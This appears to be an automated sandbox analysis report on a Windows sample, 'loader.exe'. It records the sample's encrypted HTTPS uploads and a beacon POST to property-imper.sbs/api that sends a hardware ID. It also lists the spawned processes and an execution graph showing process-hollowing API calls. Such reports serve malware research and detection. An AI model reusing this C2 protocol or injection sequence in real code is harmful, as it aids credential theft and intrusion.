                                                                                    Data Ascii: 4.p5j>sDF')$xypt!.'QdD;l)eDNr[oq{H<g_*{hJ@sltWOUHdts6=|LwV':6>=&tD_V=|&Tr/OoKs{YN1|&j\).|zFf:<$N0A,YX:[X=w
                                                                                    2024-11-23 13:09:39 UTC15331OUTData Raw: 54 07 19 38 76 fa 39 f5 ec 62 f2 3c f6 6a bf b3 67 60 df 07 70 ab 42 6c b9 25 bf 8a be d5 b8 7e ea a3 4a ff 59 36 df fb ed fb 01 65 1f 4b 7e 3e 58 ff b2 72 b0 b1 68 d8 29 4a b5 c2 f1 f7 9c e8 03 06 e2 50 55 52 9b 6e 43 6d 4c 4d 00 4d 88 b4 b5 16 b2 4a 72 d4 9b ca 59 08 42 d2 b1 e2 0b c9 9b c2 51 ef 89 ca f4 d6 1e 28 42 37 68 c2 b8 df d9 b9 e3 48 c5 c9 7d b5 1b 81 df 96 fc 5c 03 76 11 3e 48 ff 5d c3 b7 74 d1 d6 28 b9 a0 7a 29 05 71 7c 76 b3 1e d1 34 39 cf eb 90 0c ff 23 7b d4 9a 07 1c f5 9d 1c 7f 2e ac d0 be 79 2a f6 08 6d 89 7f 79 79 6a c5 57 25 4c 4c d6 ee 53 fa f0 cc 34 92 3f 2e 29 7b ab ed 70 84 34 9b 5f 1a ce 9b 0d ae b6 5d b3 6d 16 01 d7 02 c4 6b bc c1 3b 10 3c f8 a9 67 bc 8d ac 0d 08 82 8d f5 03 e9 db cd e2 a2 43 9f a1 7d 72 de 01 4b e0 ed 4a 5a f9
                                                                                    Data Ascii: T8v9b<jg`pBl%~JY6eK~>Xrh)JPURnCmLMMJrYBQ(B7hH}\v>H]t(z)q|v49#{.y*myyjW%LLS4?.){p4_]mk;<gC}rKJZ
                                                                                    2024-11-23 13:09:39 UTC15331OUTData Raw: 9c b4 29 cf d4 0a 1f 9e c1 fc e7 18 51 8f 85 7f ef 0c 57 09 31 b7 84 30 9d ba b0 e4 f6 5e a5 86 a7 a5 db 67 50 b4 24 a7 83 d8 3d a8 e2 56 92 b4 85 60 f5 90 9c 26 e7 be bb fa 31 2c d6 26 e7 b4 73 f9 a6 08 f6 aa 73 f9 80 36 0a b9 f6 42 54 62 5a 67 3f ff ca 8d 2a b0 e5 d7 2a d7 45 98 c8 62 a9 b1 fe c3 0a de 9a 0b 5c 0f 4e 95 ca c9 27 d7 91 66 14 d7 5d 77 63 21 e2 3d f2 87 01 9c 45 ba 39 17 d9 9b af 7d 52 93 1b 64 39 e1 b7 19 9c 7a c9 39 d3 38 f4 cf ad 18 c3 7a 56 de 12 48 2a e4 c2 16 60 5c be 3d 63 40 8e 0e 07 c1 71 9b d7 87 63 4c 8c 01 99 6e a4 87 de 9a a9 a1 b6 89 df ca c9 54 d3 61 9f 69 24 1a 4c 18 90 f5 10 b7 4e 0d 99 8a cb 87 bf 6c 15 1f 8b ab 0d 37 43 75 97 6f 61 31 3d b8 af 11 49 5f 6b 8b 68 1f 9b 0f e0 d7 c0 c6 e4 9a 6b 71 f2 6c cd 79 0d 84 ab 15 55
                                                                                    Data Ascii: )QW10^gP$=V`&1,&ss6BTbZg?**Eb\N'f]wc!=E9}Rd9z98zVH*`\=c@qcLnTai$LNl7Cuoa1=I_khkqlyU
                                                                                    2024-11-23 13:09:39 UTC15331OUTData Raw: 6a 45 ae 01 c1 b4 81 e1 30 96 f7 27 f9 f3 c2 d4 9c 69 6b c3 7c 1e 7f 7b 6b f6 0a d7 8c de c2 60 a6 56 3b 52 ab bb 70 82 2a 67 23 e4 20 21 c2 e3 05 af 3b bd 30 eb 33 60 6f 9a e9 5a 48 96 3c cf d7 76 e7 36 1c 53 45 54 05 26 c7 c0 5b 93 93 b6 33 83 67 63 c4 d8 46 b3 08 17 a2 0b 0c e0 d9 35 55 50 e4 07 45 b1 39 cf 54 41 14 67 e8 83 0a d0 76 81 89 35 68 ce 94 b1 90 73 88 e6 1b 1c c7 19 09 a3 9c 79 ae a1 2a c8 10 ff df 89 b1 46 a8 ff ed 82 c9 b8 07 8a c4 11 bf ce cd 94 59 61 50 61 1f 48 a7 45 dc ae 2a 44 4b 62 5a b8 a4 b7 62 ff 8e ac 8e 45 12 66 98 66 f9 7e 22 ed c2 ec 9d e6 59 c5 bd e1 df 37 0b 3d aa 3d b3 ae 8a 6c 84 50 bb 82 7b 61 ea 57 70 2e 76 cc b7 72 dd 9a 4a e6 c1 d6 64 2c 78 22 04 ba eb 11 f6 fa e0 7c c6 d2 c1 13 12 19 c7 8f 1a de a0 ba 2a 6d 65 fb dc
                                                                                    Data Ascii: jE0'ik|{k`V;Rp*g# !;03`oZH<v6SET&[3gcF5UPE9TAgv5hsy*FYaPaHE*DKbZbEff~"Y7==lP{aWp.vrJd,x"|*me
                                                                                    2024-11-23 13:09:41 UTC1027INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 13:09:41 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=kojn5ti4j2gq2jknpa3tkh0cal; expires=Wed, 19-Mar-2025 06:56:20 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DEXl4OlFTNE697iW1H8ZoSh1O0gAUCHclXhXRMhTJ%2F6P95n%2Ffzkan9wjim57laT2k4UqeRt0DaqSzJ4Ox%2FTyVFMVETuQV3Jp%2FB9XWWnlL1VfbBSOIyQ181umssSuA%2B9%2BPaxrppM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e71651b5ff243df-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2308&sent=338&recv=605&lost=0&retrans=0&sent_bytes=2846&recv_bytes=585202&delivery_rate=1276781&cwnd=243&unsent_bytes=0&cid=17d390c49237bf1b&ts=2368&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.449738172.67.162.844437372C:\Users\user\Desktop\loader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 13:09:43 UTC266OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 87
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 13:09:43 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 30 36 37 38 33 38 38 34 37 26 6a 3d 26 68 77 69 64 3d 31 36 44 45 31 33 38 37 31 38 45 33 45 41 35 43 30 30 41 38 32 30 41 41 38 35 44 32 36 41 37 43
                                                                                    Data Ascii: act=get_message&ver=4.0&lid=yau6Na--5067838847&j=&hwid=16DE138718E3EA5C00A820AA85D26A7C
                                                                                    2024-11-23 13:09:43 UTC1017INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 13:09:43 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=qc9ggemsreg3v2c0du5hh3neus; expires=Wed, 19-Mar-2025 06:56:22 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rosolp4Ay75uen8GU0mf6j8B03c8esTwkN6%2FwtTx8%2FfT3FTprRs3hyUlXcmjELwwiMybkD9CZ%2FV30MuhAtss63mIcwXn5iPRKSaL8AKGEI%2FNN5sqC4buDIssFKrZaLWH%2BiVGVFQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e7165333a6b8c36-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1779&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=989&delivery_rate=1605277&cwnd=173&unsent_bytes=0&cid=866d39e3673356a3&ts=726&x=0"
                                                                                    2024-11-23 13:09:43 UTC54INData Raw: 33 30 0d 0a 51 67 4b 48 45 71 31 66 70 73 2f 69 5a 30 44 41 37 33 72 55 61 47 6c 6b 38 4b 54 2f 39 66 4f 51 76 49 6a 43 48 35 2b 6e 69 67 77 5a 58 77 3d 3d 0d 0a
                                                                                    Data Ascii: 30QgKHEq1fps/iZ0DA73rUaGlk8KT/9fOQvIjCH5+nigwZXw==
                                                                                    2024-11-23 13:09:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:08:09:22
                                                                                    Start date:23/11/2024
                                                                                    Path:C:\Users\user\Desktop\loader.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\loader.exe"
                                                                                    Imagebase:0x240000
                                                                                    File size:495'104 bytes
                                                                                    MD5 hash:EB9DA66B64C00BC89FE8BB984995E7DA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:08:09:22
                                                                                    Start date:23/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:08:09:23
                                                                                    Start date:23/11/2024
                                                                                    Path:C:\Users\user\Desktop\loader.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\loader.exe"
                                                                                    Imagebase:0x240000
                                                                                    File size:495'104 bytes
                                                                                    MD5 hash:EB9DA66B64C00BC89FE8BB984995E7DA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:08:09:23
                                                                                    Start date:23/11/2024
                                                                                    Path:C:\Users\user\Desktop\loader.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\loader.exe"
                                                                                    Imagebase:0x240000
                                                                                    File size:495'104 bytes
                                                                                    MD5 hash:EB9DA66B64C00BC89FE8BB984995E7DA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:08:09:23
                                                                                    Start date:23/11/2024
                                                                                    Path:C:\Users\user\Desktop\loader.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\loader.exe"
                                                                                    Imagebase:0x240000
                                                                                    File size:495'104 bytes
                                                                                    MD5 hash:EB9DA66B64C00BC89FE8BB984995E7DA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:08:09:23
                                                                                    Start date:23/11/2024
                                                                                    Path:C:\Users\user\Desktop\loader.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\loader.exe"
                                                                                    Imagebase:0x240000
                                                                                    File size:495'104 bytes
                                                                                    MD5 hash:EB9DA66B64C00BC89FE8BB984995E7DA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:4.1%
                                                                                      Dynamic/Decrypted Code Coverage:0.5%
                                                                                      Signature Coverage:3.5%
                                                                                      Total number of Nodes:1672
                                                                                      Total number of Limit Nodes:24
                                                                                      execution_graph 10997 25aca2 11000 258178 LeaveCriticalSection 10997->11000 10999 25aca9 11000->10999 10209 2583ac 10210 25b0cb ___free_lconv_mon 14 API calls 10209->10210 10211 2583c4 10210->10211 11042 25a2b0 11043 25a2bb 11042->11043 11047 25a2cb 11042->11047 11048 25a3b5 11043->11048 11046 25b0cb ___free_lconv_mon 14 API calls 11046->11047 11049 25a3d0 11048->11049 11050 25a3ca 11048->11050 11051 25b0cb ___free_lconv_mon 14 API calls 11049->11051 11052 25b0cb ___free_lconv_mon 14 API calls 11050->11052 11053 25a3dc 11051->11053 11052->11049 11054 25b0cb ___free_lconv_mon 14 API calls 11053->11054 11055 25a3e7 11054->11055 11056 25b0cb ___free_lconv_mon 14 API calls 11055->11056 11057 25a3f2 11056->11057 11058 25b0cb ___free_lconv_mon 14 API calls 11057->11058 11059 25a3fd 11058->11059 11060 25b0cb ___free_lconv_mon 14 API calls 11059->11060 11061 25a408 11060->11061 11062 25b0cb ___free_lconv_mon 14 API calls 11061->11062 11063 25a413 11062->11063 11064 25b0cb ___free_lconv_mon 14 API calls 11063->11064 11065 25a41e 11064->11065 11066 25b0cb ___free_lconv_mon 14 API calls 11065->11066 11067 25a429 11066->11067 11068 25b0cb ___free_lconv_mon 14 API calls 11067->11068 11069 25a437 11068->11069 11074 25a52e 11069->11074 11075 25a53a ___scrt_is_nonwritable_in_current_image 11074->11075 11090 258161 EnterCriticalSection 11075->11090 11077 25a544 11080 25b0cb ___free_lconv_mon 14 API calls 11077->11080 11081 25a56e 11077->11081 11080->11081 11091 25a58d 11081->11091 11082 25a599 11083 25a5a5 ___scrt_is_nonwritable_in_current_image 11082->11083 11095 258161 EnterCriticalSection 11083->11095 11085 25a5af 11086 25a2d1 __dosmaperr 14 API calls 11085->11086 11087 25a5c2 11086->11087 11096 25a5e2 11087->11096 11090->11077 11094 258178 LeaveCriticalSection 11091->11094 11093 25a45d 11093->11082 11094->11093 11095->11085 11099 258178 LeaveCriticalSection 11096->11099 11098 25a2c3 11098->11046 11099->11098 10212 26b18d 10214 26b1c3 10212->10214 10213 26b310 GetPEB 10215 26b322 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 10213->10215 10214->10213 10214->10215 10220 26b3b9 TerminateProcess 10214->10220 10215->10214 10216 26b3c9 WriteProcessMemory 10215->10216 10217 26b40e 10216->10217 10218 26b413 WriteProcessMemory 10217->10218 10219 26b450 WriteProcessMemory Wow64SetThreadContext ResumeThread 10217->10219 10218->10217 10220->10214 10300 255610 10301 255618 10300->10301 10319 2582ea 10301->10319 10303 255623 10326 2550f0 10303->10326 10305 255638 __RTC_Initialize 10317 255695 10305->10317 10332 254f6a 10305->10332 10306 255444 4 API calls 10307 2556ba 10306->10307 10309 255651 10335 2573a5 10309->10335 10313 255667 10366 255933 10313->10366 10315 25568a 10372 2572a4 10315->10372 10317->10306 10318 2556b2 10317->10318 10320 25831c 10319->10320 10321 2582f9 10319->10321 10320->10303 10321->10320 10322 25b757 __strnicoll 14 API calls 10321->10322 10323 25830c 10322->10323 10324 257d69 __strnicoll 48 API calls 10323->10324 10325 258317 10324->10325 10325->10303 10327 255100 10326->10327 10328 2550fc 10326->10328 10329 255444 4 API calls 10327->10329 10331 25510d ___scrt_release_startup_lock 10327->10331 10328->10305 10330 255176 10329->10330 10331->10305 10379 254f7f 10332->10379 10336 2573ff 10335->10336 10337 257437 10336->10337 10338 257421 10336->10338 10346 25565c 10336->10346 10339 25a880 58 API calls 10337->10339 10340 25b757 __strnicoll 14 API calls 10338->10340 10341 25743d 10339->10341 10342 257426 10340->10342 10414 25ca78 GetModuleFileNameW 10341->10414 10344 257d69 __strnicoll 48 API calls 10342->10344 10344->10346 10346->10317 10365 255918 InitializeSListHead 10346->10365 10351 2574a5 10354 25753c 48 API calls 10351->10354 10352 257499 10353 25b757 __strnicoll 14 API calls 10352->10353 10355 25749e 10353->10355 10356 2574bb 10354->10356 10358 25b0cb ___free_lconv_mon 14 API calls 10355->10358 10356->10355 10357 2574df 10356->10357 10359 2574f6 10357->10359 10360 257500 10357->10360 10358->10346 10361 25b0cb ___free_lconv_mon 14 API calls 10359->10361 10362 25b0cb ___free_lconv_mon 14 API calls 10360->10362 10363 2574fe 10361->10363 10362->10363 10364 25b0cb ___free_lconv_mon 14 API calls 10363->10364 10364->10346 10365->10313 10470 2576b0 10366->10470 10368 255944 10369 25594b 10368->10369 10370 255444 4 API calls 10368->10370 10369->10315 10371 255953 10370->10371 10373 25a00a _unexpected 48 API calls 10372->10373 10375 2572af 10373->10375 10374 2572e7 10374->10317 10375->10374 10376 25b757 __strnicoll 14 API calls 10375->10376 10377 2572dc 10376->10377 10378 257d69 __strnicoll 48 API calls 10377->10378 10378->10374 10380 254f95 10379->10380 10381 254f8e 10379->10381 10388 257738 10380->10388 10385 2577a9 10381->10385 10384 254f75 10384->10309 10386 257738 51 API calls 10385->10386 10387 2577bb 10386->10387 10387->10384 10391 25799b 10388->10391 10392 2579a7 ___scrt_is_nonwritable_in_current_image 10391->10392 10399 258161 EnterCriticalSection 10392->10399 10394 2579b5 10400 2577bf 10394->10400 10396 2579c2 10410 2579ea 10396->10410 10399->10394 10401 2577da 10400->10401 10408 25784d __dosmaperr 10400->10408 10402 25d0c4 51 API calls 10401->10402 10401->10408 10409 25782d 10401->10409 10404 257823 10402->10404 10403 25d0c4 51 API calls 10405 257843 10403->10405 10406 25b0cb ___free_lconv_mon 14 API calls 10404->10406 10407 25b0cb ___free_lconv_mon 14 API calls 10405->10407 10406->10409 10407->10408 10408->10396 10409->10403 10409->10408 10413 258178 LeaveCriticalSection 10410->10413 10412 257769 10412->10384 10413->10412 10415 25caa7 GetLastError 10414->10415 10416 25cab8 10414->10416 10417 25b77d __dosmaperr 14 API calls 10415->10417 10418 25c274 48 API calls 10416->10418 10419 25cab3 10417->10419 10420 25cae9 10418->10420 10422 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 10419->10422 10436 25cb54 10420->10436 10423 257450 10422->10423 10424 25753c 10423->10424 10426 257562 10424->10426 10428 2575c0 10426->10428 10464 25cc16 10426->10464 10427 257483 10430 2573b0 10427->10430 10428->10427 10429 25cc16 48 API calls 10428->10429 10429->10428 10431 2573c1 10430->10431 10435 2573f3 10430->10435 10432 25b807 __dosmaperr 14 API calls 10431->10432 10431->10435 10433 2573ea 10432->10433 10434 25b0cb ___free_lconv_mon 14 API calls 10433->10434 10434->10435 10435->10351 10435->10352 10437 25cb70 10436->10437 10452 25cb61 10436->10452 10438 25cb9d 10437->10438 10439 25cb78 10437->10439 10440 25d131 ___scrt_uninitialize_crt WideCharToMultiByte 10438->10440 10439->10452 10457 25cb19 10439->10457 10442 25cbad 10440->10442 10443 25cbb4 GetLastError 10442->10443 10444 25cbca 10442->10444 10445 25b77d __dosmaperr 14 API calls 10443->10445 10446 25cbdb 10444->10446 10449 25cb19 14 API calls 10444->10449 10448 25cbc0 10445->10448 10446->10452 10461 25c594 10446->10461 10451 25b757 __strnicoll 14 API calls 10448->10451 10449->10446 10451->10452 10452->10419 10453 25cbf5 GetLastError 10454 25b77d __dosmaperr 14 API calls 10453->10454 10455 25cc01 10454->10455 10456 25b757 __strnicoll 14 API calls 10455->10456 10456->10452 10458 25cb24 10457->10458 10459 25b757 __strnicoll 14 API calls 10458->10459 10460 25cb2d 10459->10460 10460->10452 10462 25d131 ___scrt_uninitialize_crt WideCharToMultiByte 10461->10462 10463 25c5b1 10462->10463 10463->10452 10463->10453 10467 25cc2e 10464->10467 10468 25a8c8 __strnicoll 48 API calls 10467->10468 10469 25cc29 10468->10469 10469->10426 10471 2576ce 10470->10471 10475 2576ee 10470->10475 10472 25b757 __strnicoll 14 API calls 10471->10472 10473 2576e4 10472->10473 10474 257d69 __strnicoll 48 API calls 10473->10474 10474->10475 10475->10368 10485 257310 10488 257337 10485->10488 10489 257343 ___scrt_is_nonwritable_in_current_image 10488->10489 10496 258161 EnterCriticalSection 10489->10496 10491 25734d 10492 25737b 10491->10492 10495 25c1fa __strnicoll 14 API calls 10491->10495 10497 257399 10492->10497 10495->10491 10496->10491 10500 258178 LeaveCriticalSection 10497->10500 10499 257335 10500->10499 8841 2556e2 8842 2556ee ___scrt_is_nonwritable_in_current_image 8841->8842 8867 25508f 8842->8867 8844 2556f5 8845 25584e 8844->8845 8855 25571f ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 8844->8855 8906 255444 IsProcessorFeaturePresent 8845->8906 8847 255855 8848 25585b 8847->8848 8849 256ed5 21 API calls 8847->8849 8910 256eeb 8848->8910 8849->8848 8852 25573e 8853 2557bf 8878 257a56 8853->8878 8855->8852 8855->8853 8891 256f1f 8855->8891 8857 2557c5 8882 24cd90 8857->8882 8860 2553ec _unexpected GetModuleHandleW 8861 2557e6 8860->8861 8861->8847 8862 2557ea 8861->8862 8863 2557f3 8862->8863 8897 256f01 8862->8897 8900 2550c8 8863->8900 8868 255098 8867->8868 8913 255200 IsProcessorFeaturePresent 8868->8913 8872 2550a9 8873 2550ad 8872->8873 8923 256a60 8872->8923 8873->8844 8876 2550c4 8876->8844 8879 257a5f 8878->8879 8880 257a64 8878->8880 8995 257b7f 8879->8995 8880->8857 9677 24ce30 8882->9677 8889 254241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 8890 24ce24 8889->8890 8890->8860 8892 256f35 ___scrt_is_nonwritable_in_current_image __dosmaperr 8891->8892 8892->8853 8893 25a00a _unexpected 48 API calls 8892->8893 8896 25847c 8893->8896 8894 25835d __FrameHandler3::FrameUnwindToState 48 API calls 8895 2584a6 8894->8895 8896->8894 8898 257020 _unexpected 21 API calls 8897->8898 8899 256f0c 8898->8899 8899->8863 8901 2550d4 8900->8901 8902 2550ea 8901->8902 10064 256a72 8901->10064 8902->8852 8904 2550e2 8905 2560ca ___scrt_uninitialize_crt 7 API calls 8904->8905 8905->8902 8907 25545a std::_Xinvalid_argument _unexpected 8906->8907 8908 255505 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8907->8908 8909 255550 _unexpected 8908->8909 8909->8847 8911 257020 _unexpected 21 API calls 8910->8911 8912 255863 8911->8912 8914 2550a4 8913->8914 8915 2560ab 8914->8915 8932 259706 8915->8932 8918 2560b4 8918->8872 8920 2560bc 8921 2560c7 8920->8921 8946 259742 8920->8946 8921->8872 8986 25b105 8923->8986 8926 2560ca 8927 2560d3 8926->8927 8928 2560dd 8926->8928 8929 258811 ___vcrt_uninitialize_ptd 6 API calls 8927->8929 8928->8873 8930 2560d8 8929->8930 8931 259742 ___vcrt_uninitialize_locks DeleteCriticalSection 8930->8931 8931->8928 8934 25970f 8932->8934 8935 259738 8934->8935 8936 2560b0 8934->8936 8950 25dc17 8934->8950 8937 259742 ___vcrt_uninitialize_locks DeleteCriticalSection 8935->8937 8936->8918 8938 2587de 8936->8938 8937->8936 8967 25db28 8938->8967 8941 2587f3 8941->8920 8944 25880e 8944->8920 8947 25976c 8946->8947 8948 25974d 8946->8948 8947->8918 8949 259757 DeleteCriticalSection 8948->8949 8949->8947 8949->8949 8955 25dca9 8950->8955 8953 25dc4f InitializeCriticalSectionAndSpinCount 8954 25dc3a 8953->8954 8954->8934 8956 25dc31 8955->8956 8959 25dcca 8955->8959 8956->8953 8956->8954 8957 25dd32 GetProcAddress 8957->8956 8959->8956 8959->8957 8960 25dd23 8959->8960 8962 25dc5e LoadLibraryExW 8959->8962 8960->8957 8961 25dd2b FreeLibrary 8960->8961 8961->8957 8963 25dc75 GetLastError 8962->8963 8964 25dca5 8962->8964 8963->8964 8965 25dc80 ___vcrt_FlsGetValue 8963->8965 8964->8959 8965->8964 8966 25dc96 LoadLibraryExW 8965->8966 8966->8959 8968 25dca9 ___vcrt_FlsGetValue 5 API calls 8967->8968 8969 25db42 8968->8969 8970 25db5b TlsAlloc 8969->8970 8971 2587e8 8969->8971 8971->8941 8972 25dbd9 8971->8972 8973 25dca9 ___vcrt_FlsGetValue 5 API calls 8972->8973 8974 25dbf3 8973->8974 8975 258801 8974->8975 8976 25dc0e TlsSetValue 8974->8976 8975->8944 8977 258811 8975->8977 8976->8975 8978 258821 8977->8978 8979 25881b 8977->8979 8978->8941 8981 25db63 8979->8981 8982 25dca9 ___vcrt_FlsGetValue 5 API calls 8981->8982 8983 25db7d 8982->8983 8984 25db95 TlsFree 8983->8984 8985 25db89 8983->8985 8984->8985 8985->8978 8987 25b115 8986->8987 8988 2550b6 8986->8988 8987->8988 8990 25a732 8987->8990 8988->8876 8988->8926 8992 25a739 8990->8992 8991 25a77c GetStdHandle 8991->8992 8992->8991 8993 25a7de 8992->8993 8994 25a78f GetFileType 8992->8994 8993->8987 8994->8992 8996 257b88 8995->8996 9000 257b9e 8995->9000 8996->9000 9001 257ac0 8996->9001 8998 257b95 8998->9000 9018 257c8d 8998->9018 9000->8880 9002 257acc 9001->9002 9003 257ac9 9001->9003 9027 25a880 9002->9027 9003->8998 9008 257add 9010 25b0cb ___free_lconv_mon 14 API calls 9008->9010 9009 257ae9 9054 257bab 9009->9054 9012 257ae3 9010->9012 9012->8998 9014 25b0cb ___free_lconv_mon 14 API calls 9015 257b0d 9014->9015 9016 25b0cb ___free_lconv_mon 14 API calls 9015->9016 9017 257b13 9016->9017 9017->8998 9019 257cfe 9018->9019 9025 257c9c 9018->9025 9019->9000 9020 25d131 WideCharToMultiByte ___scrt_uninitialize_crt 9020->9025 9021 25b807 __dosmaperr 14 API calls 9021->9025 9022 257d02 9023 25b0cb ___free_lconv_mon 14 API calls 9022->9023 9023->9019 9025->9019 9025->9020 9025->9021 9025->9022 9026 25b0cb ___free_lconv_mon 14 API calls 9025->9026 9462 25d304 9025->9462 9026->9025 9028 257ad2 9027->9028 9029 25a889 9027->9029 9033 25d22d GetEnvironmentStringsW 9028->9033 9076 25a0c5 9029->9076 9034 25d245 9033->9034 9047 257ad7 9033->9047 9035 25d131 ___scrt_uninitialize_crt WideCharToMultiByte 9034->9035 9036 25d262 9035->9036 9037 25d277 9036->9037 9038 25d26c FreeEnvironmentStringsW 9036->9038 9039 25bc45 15 API calls 9037->9039 9038->9047 9040 25d27e 9039->9040 9041 25d297 9040->9041 9042 25d286 9040->9042 9044 25d131 ___scrt_uninitialize_crt WideCharToMultiByte 9041->9044 9043 25b0cb ___free_lconv_mon 14 API calls 9042->9043 9045 25d28b FreeEnvironmentStringsW 9043->9045 9046 25d2a7 9044->9046 9045->9047 9048 25d2b6 9046->9048 9049 25d2ae 9046->9049 9047->9008 9047->9009 9051 25b0cb ___free_lconv_mon 14 API calls 9048->9051 9050 25b0cb ___free_lconv_mon 14 API calls 9049->9050 9052 25d2b4 FreeEnvironmentStringsW 9050->9052 9051->9052 9052->9047 9055 257bc0 9054->9055 9056 25b807 __dosmaperr 14 API calls 9055->9056 9057 257be7 9056->9057 9058 257bef 9057->9058 9067 257bf9 9057->9067 9059 25b0cb ___free_lconv_mon 14 API calls 9058->9059 9075 257af0 9059->9075 9060 257c56 9061 25b0cb ___free_lconv_mon 14 API calls 9060->9061 9061->9075 9062 25b807 __dosmaperr 14 API calls 9062->9067 9063 257c65 9452 257b50 9063->9452 9067->9060 9067->9062 9067->9063 9069 257c80 9067->9069 9071 25b0cb ___free_lconv_mon 14 API calls 9067->9071 9443 2596ac 9067->9443 9068 25b0cb ___free_lconv_mon 14 API calls 9070 257c72 9068->9070 9458 257d96 IsProcessorFeaturePresent 9069->9458 9073 25b0cb ___free_lconv_mon 14 API calls 9070->9073 9071->9067 9073->9075 9074 257c8c 9075->9014 9077 25a0d0 9076->9077 9078 25a0d6 9076->9078 9079 259b90 __dosmaperr 6 API calls 9077->9079 9080 259bcf __dosmaperr 6 API calls 9078->9080 9099 25a0dc 9078->9099 9079->9078 9081 25a0f0 9080->9081 9082 25b807 __dosmaperr 14 API calls 9081->9082 9081->9099 9084 25a100 9082->9084 9087 25a11d 9084->9087 9088 25a108 9084->9088 9086 25a0e1 9101 25acc3 9086->9101 9090 259bcf __dosmaperr 6 API calls 9087->9090 9089 259bcf __dosmaperr 6 API calls 9088->9089 9091 25a114 9089->9091 9092 25a129 9090->9092 9096 25b0cb ___free_lconv_mon 14 API calls 9091->9096 9093 25a12d 9092->9093 9094 25a13c 